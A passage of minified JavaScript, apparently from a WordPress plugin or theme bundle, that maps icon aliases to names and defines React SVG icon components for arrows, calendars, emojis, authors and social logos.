ne",readingTime3:"book_reading_time_line",readingTime4:"clock_reading_time_1_line",readingTime5:"hourglass_timer_time_line",tag1:"tag_bookmark_save_favourite_mark_discount_sale_line",tag2:"price_tag_label_category_sale_discount_solid",tag3:"price_tag_label_category_sale_discount_line",tag4:"price_tag_offer_sale_coupon_solid",tag5:"price_tag_label_category_sale_discount_line",tag6:"growth_increase_up_solid",viewCount1:"view_count_show_visible_eye_open_1_line",viewCount2:"view_count_show_visible_eye_open_2_line",viewCount3:"view_count_show_visible_eye_open_3_line",viewCount4:"view_count_show_visible_eye_open_4_solid",viewCount5:"view_count_show_visible_eye_open_5_solid",viewCount6:"view_count_show_visible_eye_open_5_solid",author1:"author_user_human_1_line",author2:"author_user_human_4_line",author3:"author_user_human_4_solid",author4:"author_user_human_4_line",author5:"author_user_human_3_solid",user:"author_user_human_3_line",desktop:"desktop_monitor_computer_line",laptop:"laptop_computer_line",tablet:"tablet_ipad_pad_line",mobile:"mobile_smartphone_phone_line",angry_line:"angry_emoji_line",angry_solid:"angry_emoji_solid",confused_line:"confused_emoji_line",confused_solid:"confused_emoji_solid",happy_line:"happy_emoji_line",happy_solid:"happy_emoji_solid",smile_line:"smile_emoji_line",smile_solid:"smile_emoji_solid",share_line:"social_community_line",share:"share_social_solid",apple_solid:"apple_logo_icon_solid",android_solid:"android_logo_icon_solid",google_solid:"google_logo_icon_solid",messenger:"messenger_logo_icon_solid",microsoft_solid:"microsoft_logo_icon_solid",mail:"mail_email_messege_solid",media_document:"media_document",facebook:"facebook_logo_icon_solid",twitter:"twitter_x_logo_icon_line",arrowDown2:"arrow_down_dropdown_maximize_chevron_line",setting:"settings_tool_function_solid",right_circle_solid:"correct_save_check_circle_solid",full_screen:"full_screen_corners_out_solid",zoom_in:"zoom_in_magnifying_glass_plus_line",zoom_out:"zoom_out_magnifying_glass_minus_line",gallery_indicator:"gallery_indicator_image_solid",ascending:"sort_ascending_order_line",descending:"sort_descending_order_line",unlink:"unlink_link_break_line",rocket:"rocket_fly_boost_launch_pro_solid",unlock:"unlocked_open_security_solid",connect:"plugin_connect_socket_integration_line",leftAngle:"arrow_left_previous_backward_chevron_line",rightAngle:"right_triangle_angle_play_arrow_forward_line",link:"link_chains_line",subtract:(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),skype:"skype_logo_icon_solid",updated_link:"link_chains_line",tiktok_lite_solid:"tiktok_logo_icon_circle_line",tiktok_solid:"tiktok_logo_icon_solid",instagram_solid:"instagram_logo_icon_solid",linkedin:"linkedin_logo_icon_solid",whatsapp:"whatsapp_logo_icon_solid",wordpress_lite_solid:"wordpress_logo_icon_solid",wordpress_solid:"wordpress_logo_icon_2_solid",youtube_solid:"youtube_logo_icon_solid",pinterest:"pinterest_logo_icon_solid",reddit:"reddit_logo_icon_solid",five_star_line:"star_rating_line",rightAngleBold:"arrow_right_next_forward_chevron_line",leftAngleBold:"arrow_left_previous_backward_chevron_line",reset_left_line:"refresh_reset_cycle_loop_infinity_line",hamicon_1:"hamicon_1_line",hamicon_2:"hemicon_2_line",hamicon_3:"hemicon_3_line",hamicon_4:"hamicon_5_line",hamicon_5:"hemicon_2_solid",hamicon_6:"hamicon_6_line"});const l=i.toObject(),s=((0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),l.skype_logo_icon_solid,l.link_chains_line,l.facebook_logo_icon_solid,l.twitter_x_logo_icon_line,l.tiktok_logo_icon_circle_line,l.tiktok_logo_icon_solid,l.instagram_logo_icon_solid,l.linkedin_logo_icon_solid,l.whatsapp_logo_icon_solid,l.wordpress_logo_icon_solid,l.wordpress_logo_icon_2_solid,l.youtube_logo_icon_solid,l.pinterest_logo_icon_solid,l.reddit_logo_icon_solid,l.google_logo_icon_solid,l.link_chains_line,l.share_social_solid,i.toCurrentIconObj(),l)},1900:(e,t,n)=>{"use strict";n.d(t,{e:()=>r});var a=n(7294);const r={add_plus_shopping_cart_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 3h2.128a1 1 0 0 1 .991.863l1.762 12.774a1 1 0 0 0 .99.863H18.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.5 19.25a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0Zm9.75 0a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0ZM5.5 5h15.304a1 1 0 0 1 .984 1.177l-1.152 6.403a1 1 0 0 1-.898.82L7 14.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M13.745 7.5v4M11.75 9.505h4"})),android_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6.5 9.5a5.5 5.5 0 1 1 11 0V17a2 2 0 0 1-2 2h-7a2 2 0 0 1-2-2V9.5ZM20 11v6M4 11v6"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"m14 4 1.5-2M10 4 8.5 2m-2 8.5h11m-8 8.5v3m5.5-3v3M10.49 8h.01m2.99 0h.01"})),angry_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 9.5c1 0 2.69.254 2.964 1.231m0 0A.988.988 0 0 1 10 11c0 1.5-2.072-.037-.036-.269ZM17 9.5c-1 0-2.69.254-2.964 1.231m0 0A.99.99 0 0 0 14 11c0 1.5 2.072-.037.036-.269Z"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8 17c1.5-3 6.5-3 8 0"})),apple_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M19.489 8.963c-.114.089-2.127 1.23-2.127 3.768 0 2.936 2.561 3.975 2.638 4-.012.064-.407 1.423-1.35 2.808-.841 1.219-1.72 2.435-3.056 2.435-1.337 0-1.68-.781-3.223-.781-1.504 0-2.039.807-3.261.807-1.223 0-2.075-1.128-3.056-2.512C4.918 17.86 4 15.335 4 12.938 4 9.09 6.484 7.05 8.93 7.05c1.298 0 2.381.859 3.197.859.776 0 1.987-.91 3.465-.91.56 0 2.572.051 3.897 1.963ZM14.59 4.415c.533-.64.91-1.527.91-2.415 0-.123-.01-.248-.033-.349-.867.033-1.9.585-2.522 1.315-.489.561-.945 1.45-.945 2.349 0 .135.022.27.033.314.055.01.144.022.233.022.778 0 1.758-.527 2.323-1.236Z"})),arrow_down_bottom_downward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 13 12 16.5m0 0L8.5 13m3.5 3.5v-9"})),arrow_down_bottom_downward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3.5 12 8.5 8.5m0 0 8.5-8.5M12 20.5v-17"})),arrow_down_bottom_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 6v12m0 0h12M6 18 18 6"})),arrow_down_bottom_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 6v12m0 0H6m12 0L6 6"})),arrow_down_dropdown_maximize_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m6 9 6 6 6-6"})),arrow_left_backward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 15.5 7.5 12m0 0L11 8.5M7.5 12h9"})),arrow_left_backward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 20.5 3.5 12m0 0L12 3.5M3.5 12h17"})),arrow_left_forward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m12 20.5 8.5-8.5m0 0L12 3.5m8.5 8.5h-17"})),arrow_left_previous_backward_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m15 18-6-6 6-6"})),arrow_move_down_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 6v3a4 4 0 0 1-4 4H2m0 0 5 5m-5-5 5-5"})),arrow_move_down_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 6v3a4 4 0 0 0 4 4h16m0 0-5 5m5-5-5-5"})),arrow_move_up_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 18v-3a4 4 0 0 0-4-4H2m0 0 5-5m-5 5 5 5"})),arrow_move_up_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 18v-3a4 4 0 0 1 4-4h16m0 0-5-5m5 5-5 5"})),arrow_right_forward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m13 8.5 3.5 3.5m0 0L13 15.5m3.5-3.5h-9"})),arrow_right_next_forward_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m9 18 6-6-6-6"})),arrow_up_dropdown_minimize_chevron_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m18 15-6-6-6 6"})),arrow_up_top_left_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 18V6m0 0h12M6 6l12 12"})),arrow_up_top_right_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 18V6m0 0H6m12 0L6 18"})),arrow_up_top_upward_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 11 12 7.5m0 0 3.5 3.5M12 7.5v9"})),arrow_up_top_upward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3.5 12 12 3.5m0 0 8.5 8.5M12 3.5v17"})),at_a_mail_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 8v7a2 2 0 0 0 2 2 4 4 0 0 0 4-4v-1c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10c1.821 0 3.53-.487 5-1.338M16 12a4 4 0 1 1-8 0 4 4 0 0 1 8 0Z"})),author_user_human_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4.5 20.533A6.533 6.533 0 0 1 11.033 14h1.934a6.533 6.533 0 0 1 6.533 6.533.467.467 0 0 1-.467.467H4.967a.467.467 0 0 1-.467-.467Z"})),author_user_human_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.5 8a4.5 4.5 0 1 1-9 0 4.5 4.5 0 0 1 9 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 20.5a8 8 0 1 0-16 0"})),author_user_human_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 21v-3a4 4 0 0 1 4-4h8a4 4 0 0 1 4 4v3"})),author_user_human_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 13.5c-3.283 0-6.156 1.585-7.728 3.776C2.984 19.07 4.791 21 7 21h10c2.209 0 4.015-1.93 2.727-3.724C18.155 15.086 15.283 13.5 12 13.5Z"})),book_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 5v14a3 3 0 0 0 3 3h13V8H7a3 3 0 0 1-3-3Zm0 0a3 3 0 0 1 3-3h13M7 5h10"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.5 18.5v-3.092a3 3 0 0 1 .504-1.664l1.219-1.828a.934.934 0 0 1 1.554 0l1.22 1.828a3 3 0 0 1 .503 1.664V18.5m-5-2.5h5"})),book_reading_time_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 19h9M4 19V7a3 3 0 0 1 3-3h3M4 19a3 3 0 0 0 3 3h11M4 19a3 3 0 0 1 3-3h11v-4"}),(0,a.createElement)("circle",{cx:"14.5",cy:"7.5",r:"5.5",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.5 5v3l2 1"})),calendar_date_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM8 2v3m8-3v3M3 9h18M8 13.5h.01M8 17h.01M12 13.5h.01M12 17h.01M16 13.5h.01M16 17h.01"})),calendar_date_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 3h15v16a2 2 0 0 1-2 2H8a2 2 0 0 1-2-2v-1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 3h15l-3.595 13.032a2 2 0 0 1-1.928 1.468H3.313a1 1 0 0 1-.964-1.266L6 3Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 13.5 12.5 8l-2 1m-1 4.5h3m4-12-.5 3m-2.5-3-.5 3m-2.5-3-.5 3"})),calendar_date_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM8 2v3m8-3v3M3 9h18"})),calendar_date_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM7.5 2v3M12 2v3m4.5-3v3M8 13.5h.01M8 10h.01M8 17h.01M12 13.5h.01M12 10h.01M12 17h.01M16 13.5h.01M16 10h.01M16 17h.01"})),caret_up_top_triangle_angle_arrow_upward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.8 6.067a1 1 0 0 0-1.6 0l-7 9.333A1 1 0 0 0 5 17h14a1 1 0 0 0 .8-1.6l-7-9.333Z"})),category_book_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 5v14a3 3 0 0 0 3 3h13V8H7a3 3 0 0 1-3-3Zm0 0a3 3 0 0 1 3-3h13M7 5h10"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 11h-5v3h5M7.5 15.5h3m-3 3h3"})),category_file_documents_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.5 7H5a2 2 0 1 1 0-4h16v6.5L19.5 11v7h-3"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5v16h13.5V7m-10 7.5h3m-3 3h3"})),category_file_documents_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 20h16a1 1 0 0 0 1-1V8a1 1 0 0 0-1-1H6a1 1 0 0 0-1 1v12Zm0 0H4a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h11.172a2 2 0 0 1 1.414.586L19 7"})),category_file_documents_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M21 20H6a1 1 0 0 1-1-1v-8a1 1 0 0 1 1-1h7.586a1 1 0 0 0 .707-.293l2.414-2.414A1 1 0 0 1 17.414 7H21a1 1 0 0 1 1 1v11a1 1 0 0 1-1 1Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M20 7V5a1 1 0 0 0-1-1h-3.586a1 1 0 0 0-.707.293l-2.414 2.414a1 1 0 0 1-.707.293H3a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h2"})),category_file_documents_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 20V5a1 1 0 0 1 1-1h5.586a1 1 0 0 1 .707.293L11.5 6.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8 6.5h10a2 2 0 0 1 2 2V11M6 11l-4 9h16l4-9H6Z"})),clock_reading_time_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 6v6l4 2"})),clock_reading_time_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M12 2v1.5M2 12h1.5M12 22v-1.5M22 12h-1.5M13 13 9.5 9.5M11 13l5-5"})),clock_reading_time_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 13.5V16a6 6 0 0 1-6 6H2v-7a6 6 0 0 1 6-6h1"}),(0,a.createElement)("circle",{cx:"15.5",cy:"8.5",r:"6.5",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 5.111V9l2 1.111M6 15h3m-3 3h7"})),confused_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 10v1.5m7-1.5v1.5M9 17c.778-.839 3.267-2.516 7-1.845"})),correct_save_check_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 12.5 2.5 2.5L16 9"})),correct_save_check_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m4.5 13 5 5 10-12"})),cross_close_x_minimize_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 8 8 8m0-8-8 8"})),cross_x_close_minimize_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"m6 6 6 6m0 0 6 6m-6-6 6-6m-6 6-6 6"})),desktop_monitor_computer_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 3H4a2 2 0 0 0-2 2v10a2 2 0 0 0 2 2h16a2 2 0 0 0 2-2V5a2 2 0 0 0-2-2ZM8 21h8m-4-4v4m0-7.5h.01"})),dot_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2C6.477 2 2 6.477 2 12s4.477 10 10 10 10-4.477 10-10S17.523 2 12 2Z",clipRule:"evenodd"})),download_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 15v4c0 1.1.9 2 2 2h14a2 2 0 0 0 2-2v-4m-4-6-5 5-5-5m5 3.8V2.5"})),download_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7.822 8.067A5 5 0 0 0 6 17.9m12.633-5.658A7 7 0 1 0 5.248 8.147M19 9.756a4.502 4.502 0 0 1-.195 8.552M12 13v8m0 0-2.5-2.5M12 21l2.5-2.5"})),facebook_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 